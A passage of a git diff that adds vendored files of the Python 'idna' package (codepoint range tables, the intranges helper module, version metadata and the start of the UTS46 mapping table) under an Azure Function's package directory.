0x2cad00002cae, + 0x2caf00002cb0, + 0x2cb100002cb2, + 0x2cb300002cb4, + 0x2cb500002cb6, + 0x2cb700002cb8, + 0x2cb900002cba, + 0x2cbb00002cbc, + 0x2cbd00002cbe, + 0x2cbf00002cc0, + 0x2cc100002cc2, + 0x2cc300002cc4, + 0x2cc500002cc6, + 0x2cc700002cc8, + 0x2cc900002cca, + 0x2ccb00002ccc, + 0x2ccd00002cce, + 0x2ccf00002cd0, + 0x2cd100002cd2, + 0x2cd300002cd4, + 0x2cd500002cd6, + 0x2cd700002cd8, + 0x2cd900002cda, + 0x2cdb00002cdc, + 0x2cdd00002cde, + 0x2cdf00002ce0, + 0x2ce100002ce2, + 0x2ce300002ce5, + 0x2cec00002ced, + 0x2cee00002cf2, + 0x2cf300002cf4, + 0x2d0000002d26, + 0x2d2700002d28, + 0x2d2d00002d2e, + 0x2d3000002d68, + 0x2d7f00002d97, + 0x2da000002da7, + 0x2da800002daf, + 0x2db000002db7, + 0x2db800002dbf, + 0x2dc000002dc7, + 0x2dc800002dcf, + 0x2dd000002dd7, + 0x2dd800002ddf, + 0x2de000002e00, + 0x2e2f00002e30, + 0x300500003008, + 0x302a0000302e, + 0x303c0000303d, + 0x304100003097, + 0x30990000309b, + 0x309d0000309f, + 0x30a1000030fb, + 0x30fc000030ff, + 0x310500003130, + 0x31a0000031c0, + 0x31f000003200, + 0x340000004dc0, + 0x4e000000a48d, + 0xa4d00000a4fe, + 0xa5000000a60d, + 0xa6100000a62c, + 0xa6410000a642, + 0xa6430000a644, + 0xa6450000a646, + 0xa6470000a648, + 0xa6490000a64a, + 0xa64b0000a64c, + 0xa64d0000a64e, + 0xa64f0000a650, + 0xa6510000a652, + 0xa6530000a654, + 0xa6550000a656, + 0xa6570000a658, + 0xa6590000a65a, + 0xa65b0000a65c, + 0xa65d0000a65e, + 0xa65f0000a660, + 0xa6610000a662, + 0xa6630000a664, + 0xa6650000a666, + 0xa6670000a668, + 0xa6690000a66a, + 0xa66b0000a66c, + 0xa66d0000a670, + 0xa6740000a67e, + 0xa67f0000a680, + 0xa6810000a682, + 0xa6830000a684, + 0xa6850000a686, + 0xa6870000a688, + 0xa6890000a68a, + 0xa68b0000a68c, + 0xa68d0000a68e, + 0xa68f0000a690, + 0xa6910000a692, + 0xa6930000a694, + 0xa6950000a696, + 0xa6970000a698, + 0xa6990000a69a, + 0xa69b0000a69c, + 0xa69e0000a6e6, + 0xa6f00000a6f2, + 0xa7170000a720, + 0xa7230000a724, + 0xa7250000a726, + 0xa7270000a728, + 0xa7290000a72a, + 0xa72b0000a72c, + 0xa72d0000a72e, + 0xa72f0000a732, + 0xa7330000a734, + 0xa7350000a736, + 0xa7370000a738, + 0xa7390000a73a, + 0xa73b0000a73c, + 0xa73d0000a73e, + 0xa73f0000a740, + 0xa7410000a742, + 0xa7430000a744, + 0xa7450000a746, + 0xa7470000a748, + 0xa7490000a74a, + 0xa74b0000a74c, + 0xa74d0000a74e, + 0xa74f0000a750, + 0xa7510000a752, + 0xa7530000a754, + 0xa7550000a756, + 0xa7570000a758, + 0xa7590000a75a, + 0xa75b0000a75c, + 0xa75d0000a75e, + 0xa75f0000a760, + 0xa7610000a762, + 0xa7630000a764, + 0xa7650000a766, + 0xa7670000a768, + 0xa7690000a76a, + 0xa76b0000a76c, + 0xa76d0000a76e, + 0xa76f0000a770, + 0xa7710000a779, + 0xa77a0000a77b, + 0xa77c0000a77d, + 0xa77f0000a780, + 0xa7810000a782, + 0xa7830000a784, + 0xa7850000a786, + 0xa7870000a789, + 0xa78c0000a78d, + 0xa78e0000a790, + 0xa7910000a792, + 0xa7930000a796, + 0xa7970000a798, + 0xa7990000a79a, + 0xa79b0000a79c, + 0xa79d0000a79e, + 0xa79f0000a7a0, + 0xa7a10000a7a2, + 0xa7a30000a7a4, + 0xa7a50000a7a6, + 0xa7a70000a7a8, + 0xa7a90000a7aa, + 0xa7af0000a7b0, + 0xa7b50000a7b6, + 0xa7b70000a7b8, + 0xa7b90000a7ba, + 0xa7bb0000a7bc, + 0xa7bd0000a7be, + 0xa7bf0000a7c0, + 0xa7c10000a7c2, + 0xa7c30000a7c4, + 0xa7c80000a7c9, + 0xa7ca0000a7cb, + 0xa7d10000a7d2, + 0xa7d30000a7d4, + 0xa7d50000a7d6, + 0xa7d70000a7d8, + 0xa7d90000a7da, + 0xa7f20000a7f5, + 0xa7f60000a7f8, + 0xa7fa0000a828, + 0xa82c0000a82d, + 0xa8400000a874, + 0xa8800000a8c6, + 0xa8d00000a8da, + 0xa8e00000a8f8, + 0xa8fb0000a8fc, + 0xa8fd0000a92e, + 0xa9300000a954, + 0xa9800000a9c1, + 0xa9cf0000a9da, + 0xa9e00000a9ff, + 0xaa000000aa37, + 0xaa400000aa4e, + 0xaa500000aa5a, + 0xaa600000aa77, + 0xaa7a0000aac3, + 0xaadb0000aade, + 0xaae00000aaf0, + 0xaaf20000aaf7, + 0xab010000ab07, + 0xab090000ab0f, + 0xab110000ab17, + 0xab200000ab27, + 0xab280000ab2f, + 0xab300000ab5b, + 0xab600000ab6a, + 0xabc00000abeb, + 0xabec0000abee, + 0xabf00000abfa, + 0xac000000d7a4, + 0xfa0e0000fa10, + 0xfa110000fa12, + 0xfa130000fa15, + 0xfa1f0000fa20, + 0xfa210000fa22, + 0xfa230000fa25, + 0xfa270000fa2a, + 0xfb1e0000fb1f, + 0xfe200000fe30, + 0xfe730000fe74, + 0x100000001000c, + 0x1000d00010027, + 0x100280001003b, + 0x1003c0001003e, + 0x1003f0001004e, + 0x100500001005e, + 0x10080000100fb, + 0x101fd000101fe, + 0x102800001029d, + 0x102a0000102d1, + 0x102e0000102e1, + 0x1030000010320, + 0x1032d00010341, + 0x103420001034a, + 0x103500001037b, + 0x103800001039e, + 0x103a0000103c4, + 0x103c8000103d0, + 0x104280001049e, + 0x104a0000104aa, + 0x104d8000104fc, + 0x1050000010528, + 0x1053000010564, + 0x10597000105a2, + 0x105a3000105b2, + 0x105b3000105ba, + 0x105bb000105bd, + 0x1060000010737, + 0x1074000010756, + 0x1076000010768, + 0x1078000010786, + 0x10787000107b1, + 0x107b2000107bb, + 0x1080000010806, + 0x1080800010809, + 0x1080a00010836, + 0x1083700010839, + 0x1083c0001083d, + 0x1083f00010856, + 0x1086000010877, + 0x108800001089f, + 0x108e0000108f3, + 0x108f4000108f6, + 0x1090000010916, + 0x109200001093a, + 0x10980000109b8, + 0x109be000109c0, + 0x10a0000010a04, + 0x10a0500010a07, + 0x10a0c00010a14, + 0x10a1500010a18, + 0x10a1900010a36, + 0x10a3800010a3b, + 0x10a3f00010a40, + 0x10a6000010a7d, + 0x10a8000010a9d, + 0x10ac000010ac8, + 0x10ac900010ae7, + 0x10b0000010b36, + 0x10b4000010b56, + 0x10b6000010b73, + 0x10b8000010b92, + 0x10c0000010c49, + 0x10cc000010cf3, + 0x10d0000010d28, + 0x10d3000010d3a, + 0x10e8000010eaa, + 0x10eab00010ead, + 0x10eb000010eb2, + 0x10f0000010f1d, + 0x10f2700010f28, + 0x10f3000010f51, + 0x10f7000010f86, + 0x10fb000010fc5, + 0x10fe000010ff7, + 0x1100000011047, + 0x1106600011076, + 0x1107f000110bb, + 0x110c2000110c3, + 0x110d0000110e9, + 0x110f0000110fa, + 0x1110000011135, + 0x1113600011140, + 0x1114400011148, + 0x1115000011174, + 0x1117600011177, + 0x11180000111c5, + 0x111c9000111cd, + 0x111ce000111db, + 0x111dc000111dd, + 0x1120000011212, + 0x1121300011238, + 0x1123e0001123f, + 0x1128000011287, + 0x1128800011289, + 0x1128a0001128e, + 0x1128f0001129e, + 0x1129f000112a9, + 0x112b0000112eb, + 0x112f0000112fa, + 0x1130000011304, + 0x113050001130d, + 0x1130f00011311, + 0x1131300011329, + 0x1132a00011331, + 0x1133200011334, + 0x113350001133a, + 0x1133b00011345, + 0x1134700011349, + 0x1134b0001134e, + 0x1135000011351, + 0x1135700011358, + 0x1135d00011364, + 0x113660001136d, + 0x1137000011375, + 0x114000001144b, + 0x114500001145a, + 0x1145e00011462, + 0x11480000114c6, + 0x114c7000114c8, + 0x114d0000114da, + 0x11580000115b6, + 0x115b8000115c1, + 0x115d8000115de, + 0x1160000011641, + 0x1164400011645, + 0x116500001165a, + 0x11680000116b9, + 0x116c0000116ca, + 0x117000001171b, + 0x1171d0001172c, + 0x117300001173a, + 0x1174000011747, + 0x118000001183b, + 0x118c0000118ea, + 0x118ff00011907, + 0x119090001190a, + 0x1190c00011914, + 0x1191500011917, + 0x1191800011936, + 0x1193700011939, + 0x1193b00011944, + 0x119500001195a, + 0x119a0000119a8, + 0x119aa000119d8, + 0x119da000119e2, + 0x119e3000119e5, + 0x11a0000011a3f, + 0x11a4700011a48, + 0x11a5000011a9a, + 0x11a9d00011a9e, + 0x11ab000011af9, + 0x11c0000011c09, + 0x11c0a00011c37, + 0x11c3800011c41, + 0x11c5000011c5a, + 0x11c7200011c90, + 0x11c9200011ca8, + 0x11ca900011cb7, + 0x11d0000011d07, + 0x11d0800011d0a, + 0x11d0b00011d37, + 0x11d3a00011d3b, + 0x11d3c00011d3e, + 0x11d3f00011d48, + 0x11d5000011d5a, + 0x11d6000011d66, + 0x11d6700011d69, + 0x11d6a00011d8f, + 0x11d9000011d92, + 0x11d9300011d99, + 0x11da000011daa, + 0x11ee000011ef7, + 0x11fb000011fb1, + 0x120000001239a, + 0x1248000012544, + 0x12f9000012ff1, + 0x130000001342f, + 0x1440000014647, + 0x1680000016a39, + 0x16a4000016a5f, + 0x16a6000016a6a, + 0x16a7000016abf, + 0x16ac000016aca, + 0x16ad000016aee, + 0x16af000016af5, + 0x16b0000016b37, + 0x16b4000016b44, + 0x16b5000016b5a, + 0x16b6300016b78, + 0x16b7d00016b90, + 0x16e6000016e80, + 0x16f0000016f4b, + 0x16f4f00016f88, + 0x16f8f00016fa0, + 0x16fe000016fe2, + 0x16fe300016fe5, + 0x16ff000016ff2, + 0x17000000187f8, + 0x1880000018cd6, + 0x18d0000018d09, + 0x1aff00001aff4, + 0x1aff50001affc, + 0x1affd0001afff, + 0x1b0000001b123, + 0x1b1500001b153, + 0x1b1640001b168, + 0x1b1700001b2fc, + 0x1bc000001bc6b, + 0x1bc700001bc7d, + 0x1bc800001bc89, + 0x1bc900001bc9a, + 0x1bc9d0001bc9f, + 0x1cf000001cf2e, + 0x1cf300001cf47, + 0x1da000001da37, + 0x1da3b0001da6d, + 0x1da750001da76, + 0x1da840001da85, + 0x1da9b0001daa0, + 0x1daa10001dab0, + 0x1df000001df1f, + 0x1e0000001e007, + 0x1e0080001e019, + 0x1e01b0001e022, + 0x1e0230001e025, + 0x1e0260001e02b, + 0x1e1000001e12d, + 0x1e1300001e13e, + 0x1e1400001e14a, + 0x1e14e0001e14f, + 0x1e2900001e2af, + 0x1e2c00001e2fa, + 0x1e7e00001e7e7, + 0x1e7e80001e7ec, + 0x1e7ed0001e7ef, + 0x1e7f00001e7ff, + 0x1e8000001e8c5, + 0x1e8d00001e8d7, + 0x1e9220001e94c, + 0x1e9500001e95a, + 0x1fbf00001fbfa, + 0x200000002a6e0, + 0x2a7000002b739, + 0x2b7400002b81e, + 0x2b8200002cea2, + 0x2ceb00002ebe1, + 0x300000003134b, + ), + 'CONTEXTJ': ( + 0x200c0000200e, + ), + 'CONTEXTO': ( + 0xb7000000b8, + 0x37500000376, + 0x5f3000005f5, + 0x6600000066a, + 0x6f0000006fa, + 0x30fb000030fc, + ), +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/intranges.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/intranges.py new file mode 100644 index 0000000..822f342 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/intranges.py @@ -0,0 +1,54 @@ +""" +Given a list of integers, made up of (hopefully) a small number of long runs +of consecutive integers, compute a representation of the form +((start1, end1), (start2, end2) ...). Then answer the question "was x present +in the original list?" in time O(log(# runs)). +""" + +import bisect +from typing import List, Tuple + +def intranges_from_list(list_: List[int]) -> Tuple[int, ...]: + """Represent a list of integers as a sequence of ranges: + ((start_0, end_0), (start_1, end_1), ...), such that the original + integers are exactly those x such that start_i <= x < end_i for some i. + + Ranges are encoded as single integers (start << 32 | end), not as tuples. + """ + + sorted_list = sorted(list_) + ranges = [] + last_write = -1 + for i in range(len(sorted_list)): + if i+1 < len(sorted_list): + if sorted_list[i] == sorted_list[i+1]-1: + continue + current_range = sorted_list[last_write+1:i+1] + ranges.append(_encode_range(current_range[0], current_range[-1] + 1)) + last_write = i + + return tuple(ranges) + +def _encode_range(start: int, end: int) -> int: + return (start << 32) | end + +def _decode_range(r: int) -> Tuple[int, int]: + return (r >> 32), (r & ((1 << 32) - 1)) + + +def intranges_contain(int_: int, ranges: Tuple[int, ...]) -> bool: + """Determine if `int_` falls into one of the ranges in `ranges`.""" + tuple_ = _encode_range(int_, 0) + pos = bisect.bisect_left(ranges, tuple_) + # we could be immediately ahead of a tuple (start, end) + # with start < int_ <= end + if pos > 0: + left, right = _decode_range(ranges[pos-1]) + if left <= int_ < right: + return True + # or we could be immediately behind a tuple (int_, end) + if pos < len(ranges): + left, _ = _decode_range(ranges[pos]) + if left == int_: + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/package_data.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/package_data.py new file mode 100644 index 0000000..164ae00 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/package_data.py @@ -0,0 +1,2 @@ +__version__ = '3.3' + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/uts46data.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/uts46data.py new file mode 100644 index 0000000..ff69703 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/uts46data.py @@ -0,0 +1,8512 @@ +# This file is automatically generated by tools/idna-data +# vim: set fileencoding=utf-8 : + +from typing import List, Tuple, Union + + +"""IDNA Mapping Table from UTS46.""" + + +__version__ = '14.0.0' +def _seg_0() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x0, '3'), + (0x1, '3'), + (0x2, '3'), + (0x3, '3'), + (0x4, '3'), + (0x5, '3'), + (0x6, '3'), + (0x7, '3'), + (0x8, '3'), + (0x9, '3'), + (0xA, '3'), + (0xB, '3'), + (0xC, '3'), + (0xD, '3'), + (0xE, '3'), + (0xF, '3'), + (0x10, '3'), + (0x11, '3'), + (0x12, '3'), + (0x13, '3'), + (0x14, '3'), + (0x15, '3'), + (0x16, '3'), + (0x17, '3'), + (0x18, '3'), + (0x19, '3'), + (0x1A, '3'), + (0x1B, '3'), + (0x1C, '3'), + (0x1D, '3'), + (0x1E, '3'), + (0x1F, '3'), + (0x20, '3'), + (0x21, '3'), + (0x22, '3'), + (0x23, '3'), + (0x24, '3'), + (0x25, '3'), + (0x26, '3'), + (0x27, '3'), + (0x28, '3'), + (0x29, '3'), + (0x2A, '3'), + (0x2B, '3'), + (0x2C, '3'), + (0x2D, 'V'), + (0x2E, 'V'), + (0x2F, '3'), + (0x30, 'V'), + (0x31, 'V'), + (0x32, 'V'), + (0x33, 'V'), + (0x34, 'V'), + (0x35, 'V'), + (0x36, 'V'), + (0x37, 'V'), + (0x38, 'V'), + (0x39, 'V'), + (0x3A, '3'), + (0x3B, '3'), + (0x3C, '3'), + (0x3D, '3'), + (0x3E, '3'), + (0x3F, '3'), + (0x40, '3'), + (0x41, 'M', 'a'), + (0x42, 'M', 'b'), + (0x43, 'M', 'c'), + (0x44, 'M', 'd'), + (0x45, 'M', 'e'), + (0x46, 'M', 'f'), + (0x47, 'M', 'g'), + (0x48, 'M', 'h'), + (0x49, 'M', 'i'), + (0x4A, 'M', 'j'), + (0x4B, 'M', 'k'), + (0x4C, 'M', 'l'), + (0x4D, 'M', 'm'), + (0x4E, 'M', 'n'), + (0x4F, 'M', 'o'), + (0x50, 'M', 'p'), + (0x51, 'M', 'q'), + (0x52, 'M', 'r'), + (0x53, 'M', 's'), + (0x54, 'M', 't'), + (0x55, 'M', 'u'), + (0x56, 'M', 'v'), + (0x57, 'M', 'w'), + (0x58, 'M', 'x'), + (0x59, 'M', 'y'), + (0x5A, 'M', 'z'), + (0x5B, '3'), + (0x5C, '3'), + (0x5D, '3'), + (0x5E, '3'), + (0x5F, '3'), + (0x60, '3'), + (0x61, 'V'), + (0x62, 'V'), + (0x63, 'V'), + ] + +def _seg_1() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x64, 'V'), + (0x65, 'V'), + (0x66, 'V'), + (0x67, 'V'), + (0x68, 'V'), + (0x69, 'V'), + (0x6A, 'V'), + (0x6B, 'V'), + (0x6C, 'V'), + (0x6D, 'V'), + (0x6E, 'V'), + (0x6F, 'V'), + (0x70, 'V'), + (0x71, 'V'), + (0x72, 'V'), + (0x73, 'V'), + (0x74, 'V'), + (0x75, 'V'), + (0x76, 'V'), + (0x77, 'V'), + (0x78, 'V'), + (0x79, 'V'), + (0x7A, 'V'), + (0x7B, '3'), + (0x7C, '3'), + (0x7D, '3'), + (0x7E, '3'), + (0x7F, '3'), + (0x80, 'X'), + (0x81, 'X'), + (0x82, 'X'), + (0x83, 'X'), + (0x84, 'X'), + (0x85, 'X'), + (0x86, 'X'), + (0x87, 'X'), + (0x88, 'X'), + (0x89, 'X'), + (0x8A, 'X'), + (0x8B, 'X'), + (0x8C, 'X'), + (0x8D, 'X'), + (0x8E, 'X'), + (0x8F, 'X'), + (0x90, 'X'), + (0x91, 'X'), + (0x92, 'X'), + (0x93, 'X'), + (0x94, 'X'), + (0x95, 'X'), + (0x96, 'X'), + (0x97, 'X'), + (0x98, 'X'), + (0x99, 'X'), + (0x9A, 'X'), + (0x9B, 'X'), + (0x9C, 'X'), + (0x9D, 'X'), + (0x9E, 'X'), + (0x9F, 'X'), + (0xA0, '3', ' '), + (0xA1, 'V'), + (0xA2, 'V'), + (0xA3, 'V'), + (0xA4, 'V'), + (0xA5, 'V'), + (0xA6, 'V'), + (0xA7, 'V'), + (0xA8, '3', ' ̈'), + (0xA9, 'V'), + (0xAA, 'M', 'a'), + (0xAB, 'V'), + (0xAC, 'V'), + (0xAD, 'I'), + (0xAE, 'V'), + (0xAF, '3', ' ̄'), + (0xB0, 'V'), + (0xB1, 'V'), + (0xB2, 'M', '2'), + (0xB3, 'M', '3'), + (0xB4, '3', ' ́'), + (0xB5, 'M', 'μ'), + (0xB6, 'V'), + (0xB7, 'V'), + (0xB8, '3', ' ̧'), + (0xB9, 'M', '1'), + (0xBA, 'M', 'o'), + (0xBB, 'V'), + (0xBC, 'M', '1⁄4'), + (0xBD, 'M', '1⁄2'), + (0xBE, 'M', '3⁄4'), + (0xBF, 'V'), + (0xC0, 'M', 'à'), + (0xC1, 'M', 'á'), + (0xC2, 'M', 'â'), + (0xC3, 'M', 'ã'), + (0xC4, 'M', 'ä'), + (0xC5, 'M', 'å'), + (0xC6, 'M', 'æ'), + (0xC7, 'M', 'ç'), + ] + +def _seg_2() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xC8, 'M', 'è'), + (0xC9, 'M', 'é'), + (0xCA, 'M', 'ê'), + (0xCB, 'M', 'ë'), + (0xCC, 'M', 'ì'), + (0xCD, 'M', 'í'), + (0xCE, 'M', 'î'), + (0xCF, 'M', 'ï'), + (0xD0, 'M', 'ð'), + (0xD1, 'M', 'ñ'), + (0xD2, 'M', 'ò'), + (0xD3, 'M', 'ó'), + (0xD4, 'M', 'ô'), + (0xD5, 'M', 'õ'), + (0xD6, 'M', 'ö'), + (0xD7, 'V'), + (0xD8, 'M', 'ø'), + (0xD9, 'M', 'ù'), + (0xDA, 'M', 'ú'), + (0xDB, 'M', 'û'), + (0xDC, 'M', 'ü'), + (0xDD, 'M', 'ý'), + (0xDE, 'M', 'þ'), + (0xDF, 'D', 'ss'), + (0xE0, 'V'), + (0xE1, 'V'), + (0xE2, 'V'), + (0xE3, 'V'), + (0xE4, 'V'), + (0xE5, 'V'), + (0xE6, 'V'), + (0xE7, 'V'), + (0xE8, 'V'), + (0xE9, 'V'), + (0xEA, 'V'), + (0xEB, 'V'), + (0xEC, 'V'), + (0xED, 'V'), + (0xEE, 'V'), + (0xEF, 'V'), + (0xF0, 'V'), + (0xF1, 'V'), + (0xF2, 'V'), + (0xF3, 'V'), + (0xF4, 'V'), + (0xF5, 'V'), + (0xF6, 'V'), + (0xF7, 'V'), + (0xF8, 'V'), + (0xF9, 'V'), + (0xFA, 'V'), + (0xFB, 'V'), + (0xFC, 'V'), + (0xFD, 'V'), + (0xFE, 'V'), + (0xFF, 'V'), + (0x100, 'M', 'ā'), + (0x101, 'V'), + (0x102, 'M', 'ă'), + (0x103, 'V'), + (0x104, 'M', 'ą'), + (0x105, 'V'), + (0x106, 'M', 'ć'), + (0x107, 'V'), + (0x108, 'M', 'ĉ'), + (0x109, 'V'), + (0x10A, 'M', 'ċ'), + (0x10B, 'V'), + (0x10C, 'M', 'č'), + (0x10D, 'V'), + (0x10E, 'M', 'ď'), + (0x10F, 'V'), + (0x110, 'M', 'đ'), + (0x111, 'V'), + (0x112, 'M', 'ē'), + (0x113, 'V'), + (0x114, 'M', 'ĕ'), + (0x115, 'V'), + (0x116, 'M', 'ė'), + (0x117, 'V'), + (0x118, 'M', 'ę'), + (0x119, 'V'), + (0x11A, 'M', 'ě'), + (0x11B, 'V'), + (0x11C, 'M', 'ĝ'), + (0x11D, 'V'), + (0x11E, 'M', 'ğ'), + (0x11F, 'V'), + (0x120, 'M', 'ġ'), + (0x121, 'V'), + (0x122, 'M', 'ģ'), + (0x123, 'V'), + (0x124, 'M', 'ĥ'), + (0x125, 'V'), + (0x126, 'M', 'ħ'), + (0x127, 'V'), + (0x128, 'M', 'ĩ'), + (0x129, 'V'), + (0x12A, 'M', 'ī'), + (0x12B, 'V'), + ] + +def _seg_3() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x12C, 'M', 'ĭ'), + (0x12D, 'V'), + (0x12E, 'M', 'į'), + (0x12F, 'V'), + (0x130, 'M', 'i̇'), + (0x131, 'V'), + (0x132, 'M', 'ij'), + (0x134, 'M', 'ĵ'), + (0x135, 'V'), + (0x136, 'M', 'ķ'), + (0x137, 'V'), + (0x139, 'M', 'ĺ'), + (0x13A, 'V'), + (0x13B, 'M', 'ļ'), + (0x13C, 'V'), + (0x13D, 'M', 'ľ'), + (0x13E, 'V'), + (0x13F, 'M', 'l·'), + (0x141, 'M', 'ł'), + (0x142, 'V'), + (0x143, 'M', 'ń'), + (0x144, 'V'), + (0x145, 'M', 'ņ'), + (0x146, 'V'), + (0x147, 'M', 'ň'), + (0x148, 'V'), + (0x149, 'M', 'ʼn'), + (0x14A, 'M', 'ŋ'), + (0x14B, 'V'), + (0x14C, 'M', 'ō'), + (0x14D, 'V'), + (0x14E, 'M', 'ŏ'), + (0x14F, 'V'), + (0x150, 'M', 'ő'), + (0x151, 'V'), + (0x152, 'M', 'œ'), + (0x153, 'V'), + (0x154, 'M', 'ŕ'), + (0x155, 'V'), + (0x156, 'M', 'ŗ'), + (0x157, 'V'), + (0x158, 'M', 'ř'), + (0x159, 'V'), + (0x15A, 'M', 'ś'), + (0x15B, 'V'), + (0x15C, 'M', 'ŝ'), + (0x15D, 'V'), + (0x15E, 'M', 'ş'), + (0x15F, 'V'), + (0x160, 'M', 'š'), + (0x161, 'V'), + (0x162, 'M', 'ţ'), + (0x163, 'V'), + (0x164, 'M', 'ť'), + (0x165, 'V'), + (0x166, 'M', 'ŧ'), + (0x167, 'V'), + (0x168, 'M', 'ũ'), + (0x169, 'V'), + (0x16A, 'M', 'ū'), + (0x16B, 'V'), + (0x16C, 'M', 'ŭ'), + (0x16D, 'V'), + (0x16E, 'M', 'ů'), + (0x16F, 'V'), + (0x170, 'M', 'ű'), + (0x171, 'V'), + (0x172, 'M', 'ų'), + (0x173, 'V'), + (0x174, 'M', 'ŵ'), + (0x175, 'V'), + (0x176, 'M', 'ŷ'), + (0x177, 'V'), + (0x178, 'M', 'ÿ'), + (0x179, 'M', 'ź'), + (0x17A, 'V'), + (0x17B, 'M', 'ż'), + (0x17C, 'V'), + (0x17D, 'M', 'ž'), + (0x17E, 'V'), + (0x17F, 'M', 's'), + (0x180, 'V'), + (0x181, 'M', 'ɓ'), + (0x182, 'M', 'ƃ'), + (0x183, 'V'), + (0x184, 'M', 'ƅ'), + (0x185, 'V'), + (0x186, 'M', 'ɔ'), + (0x187, 'M', 'ƈ'), + (0x188, 'V'), + (0x189, 'M', 'ɖ'), + (0x18A, 'M', 'ɗ'), + (0x18B, 'M', 'ƌ'), + (0x18C, 'V'), + (0x18E, 'M', 'ǝ'), + (0x18F, 'M', 'ə'), + (0x190, 'M', 'ɛ'), + (0x191, 'M', 'ƒ'), + (0x192, 'V'), + (0x193, 'M', 'ɠ'), + ] + +def _seg_4() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x194, 'M', 'ɣ'), + (0x195, 'V'), + (0x196, 'M', 'ɩ'), + (0x197, 'M', 'ɨ'), + (0x198, 'M', 'ƙ'), + (0x199, 'V'), + (0x19C, 'M', 'ɯ'), + (0x19D, 'M', 'ɲ'), + (0x19E, 'V'), + (0x19F, 'M', 'ɵ'), + (0x1A0, 'M', 'ơ'), + (0x1A1, 'V'), + (0x1A2, 'M', 'ƣ'), + (0x1A3, 'V'), + (0x1A4, 'M', 'ƥ'), + (0x1A5, 'V'), + (0x1A6, 'M', 'ʀ'), + (0x1A7, 'M', 'ƨ'), + (0x1A8, 'V'), + (0x1A9, 'M', 'ʃ'), + (0x1AA, 'V'), + (0x1AC, 'M', 'ƭ'), + (0x1AD, 'V'), + (0x1AE, 'M', 'ʈ'), + (0x1AF, 'M', 'ư'), + (0x1B0, 'V'), + (0x1B1, 'M', 'ʊ'), + (0x1B2, 'M', 'ʋ'), + (0x1B3, 'M', 'ƴ'), + (0x1B4, 'V'), + (0x1B5, 'M', 'ƶ'), + (0x1B6, 'V'), + (0x1B7, 'M', 'ʒ'), + (0x1B8, 'M', 'ƹ'), + (0x1B9, 'V'), + (0x1BC, 'M', 'ƽ'), + (0x1BD, 'V'), + (0x1C4, 'M', 'dž'), + (0x1C7, 'M', 'lj'), + (0x1CA, 'M', 'nj'), + (0x1CD, 'M', 'ǎ'), + (0x1CE, 'V'), + (0x1CF, 'M', 'ǐ'), + (0x1D0, 'V'), + (0x1D1, 'M', 'ǒ'), + (0x1D2, 'V'), + (0x1D3, 'M', 'ǔ'), + (0x1D4, 'V'), + (0x1D5, 'M', 'ǖ'), + (0x1D6, 'V'), + (0x1D7, 'M', 'ǘ'), + (0x1D8, 'V'), + (0x1D9, 'M', 'ǚ'), + (0x1DA, 'V'), + (0x1DB, 'M', 'ǜ'), + (0x1DC, 'V'), + (0x1DE, 'M', 'ǟ'), + (0x1DF, 'V'), + (0x1E0, 'M', 'ǡ'), + (0x1E1, 'V'), + (0x1E2, 'M', 'ǣ'), + (0x1E3, 'V'), + (0x1E4, 'M', 'ǥ'), + (0x1E5, 'V'), + (0x1E6, 'M', 'ǧ'), + (0x1E7, 'V'), + (0x1E8, 'M', 'ǩ'), + (0x1E9, 'V'), + (0x1EA, 'M', 'ǫ'), + (0x1EB, 'V'), + (0x1EC, 'M', 'ǭ'), + (0x1ED, 'V'), + (0x1EE, 'M', 'ǯ'), + (0x1EF, 'V'), + (0x1F1, 'M', 'dz'), + (0x1F4, 'M', 'ǵ'), + (0x1F5, 'V'), + (0x1F6, 'M', 'ƕ'), + (0x1F7, 'M', 'ƿ'), + (0x1F8, 'M', 'ǹ'), + (0x1F9, 'V'), + (0x1FA, 'M', 'ǻ'), + (0x1FB, 'V'), + (0x1FC, 'M', 'ǽ'), + (0x1FD, 'V'), + (0x1FE, 'M', 'ǿ'), + (0x1FF, 'V'), + (0x200, 'M', 'ȁ'), + (0x201, 'V'), + (0x202, 'M', 'ȃ'), + (0x203, 'V'), + (0x204, 'M', 'ȅ'), + (0x205, 'V'), + (0x206, 'M', 'ȇ'), + (0x207, 'V'), + (0x208, 'M', 'ȉ'), + (0x209, 'V'), + (0x20A, 'M', 'ȋ'), + (0x20B, 'V'), + (0x20C, 'M', 'ȍ'), + ] + +def _seg_5() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x20D, 'V'), + (0x20E, 'M', 'ȏ'), + (0x20F, 'V'), + (0x210, 'M', 'ȑ'), + (0x211, 'V'), + (0x212, 'M', 'ȓ'), + (0x213, 'V'), + (0x214, 'M', 'ȕ'), + (0x215, 'V'), + (0x216, 'M', 'ȗ'), + (0x217, 'V'), + (0x218, 'M', 'ș'), + (0x219, 'V'), + (0x21A, 'M', 'ț'), + (0x21B, 'V'), + (0x21C, 'M', 'ȝ'), + (0x21D, 'V'), + (0x21E, 'M', 'ȟ'), + (0x21F, 'V'), + (0x220, 'M', 'ƞ'), + (0x221, 'V'), + (0x222, 'M', 'ȣ'), + (0x223, 'V'), + (0x224, 'M', 'ȥ'), + (0x225, 'V'), + (0x226, 'M', 'ȧ'), + (0x227, 'V'), + (0x228, 'M', 'ȩ'), + (0x229, 'V'), + (0x22A, 'M', 'ȫ'), + (0x22B, 'V'), + (0x22C, 'M', 'ȭ'), + (0x22D, 'V'), + (0x22E, 'M', 'ȯ'), + (0x22F, 'V'), 